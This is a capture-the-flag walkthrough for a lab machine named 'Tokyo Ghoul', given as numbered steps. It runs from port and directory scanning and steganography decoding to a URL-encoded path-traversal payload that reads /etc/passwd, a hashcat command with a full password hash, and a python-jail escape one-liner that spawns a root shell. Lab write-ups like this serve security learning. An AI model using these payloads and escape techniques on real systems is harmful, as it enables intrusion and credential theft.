Tokyo Ghoul

1. Scanning all ports and OS.

sudo nmap -sV -p- 10.10.10.64

2. Website, link and it's source code.

3. FTP to the machine to check the available files.

4. Downloading and cheking all the files

mget *

5. Checking the lines above and below the keyword

strings need_to_talk | grep phrase -A 5 -B 5

6. Using the found word.

7. Examining the picture and extracting new data.

steghide --extract -sf rize_and_kaneki.jpg

passphrase

You_found_1t

yougotme.txt

..... .-
....- ....-
....- -....
--... ----.
....- -..
...-- ..---
....- -..
...-- ...--
....- -..
....- ---..
....- .-
...-- .....
..... ---..
...-- ..---
....- .
-.... -.-.
-.... ..---
-.... .
..... ..---
-.... -.-.
-.... ...--
-.... --...
...-- -..
...-- -..

using only CLI

1 Copy the file and remove all the unnecessary text.

2 Decode the text with morse2ascii tool and redirect output to a new file.

3 Convert output with xxd and decode base64 text.

8. Checking the new directory on the website.

9. Scanning the directory.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.10.64/d1r3c70ry_center -q

10. Both buttons show the same URL, checking LFI.

11. Trying again with URL encoding.

http://<IP>/d1r3c70ry_center/claim/index.php?view=%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd

12. Cracking the hash.

hashcat.exe -a 0 -m 1800 "$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0" rockyou.txt

13. SSH to the machine.

14. User.txt flag.

15. Checking SUDO permissions and python script.

16. Escaping python jail using the __builtins__ module.

based on https://anee.me/escaping-python-jails-849c65cf306e

__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')

17. Root.txt flag.

PreviousOh My WebServer NextUltraTech

Last updated 2 years ago